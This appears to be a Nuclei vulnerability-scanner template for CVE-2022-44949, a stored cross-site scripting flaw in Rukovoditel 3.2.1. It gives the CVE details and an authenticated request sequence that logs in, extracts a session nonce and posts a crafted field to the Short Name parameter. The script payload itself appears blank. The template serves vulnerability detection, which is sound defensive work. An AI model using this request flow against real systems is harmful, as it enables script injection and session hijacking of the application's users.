id: CVE-2022-44949 info: name: Rukovoditel <= 3.2.1 - Cross Site Scripting author: r3Y3r53 severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/12 - http://rukovoditel.com/ - https://nvd.nist.gov/vuln/detail/CVE-2022-44949 - http://rukovoditel.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-44949 cwe-id: CWE-79 epss-score: 0.00091 epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive http: - raw: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - | POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="form_session_token" {{nonce}} ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="entities_id" 24 ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="forms_tabs_id" 29 ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="name" test ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="short_name" ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="type" fieldtype_input ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="fields_configuration[width]" input-small ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="fields_configuration[default_value]" ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="fields_configuration[is_unique]" 0 ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="required_message" ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="tooltip" ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="tooltip_item_page" ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="access_template" ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="access[5]" yes ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="access[4]" yes ------WebKitFormBoundaryfKx13B5QBU5Sccgf Content-Disposition: form-data; name="notes" ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- redirects: true max-redirects: 3 matchers: - type: dsl dsl: - status_code_3 == 200 - contains(content_type_3, "text/html") - contains(body_3, "") - contains(body_3, "rukovoditel") condition: and extractors: - type: regex name: nonce group: 1 regex: - id="form_session_token" value="(.*)" type="hidden" internal: true # digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950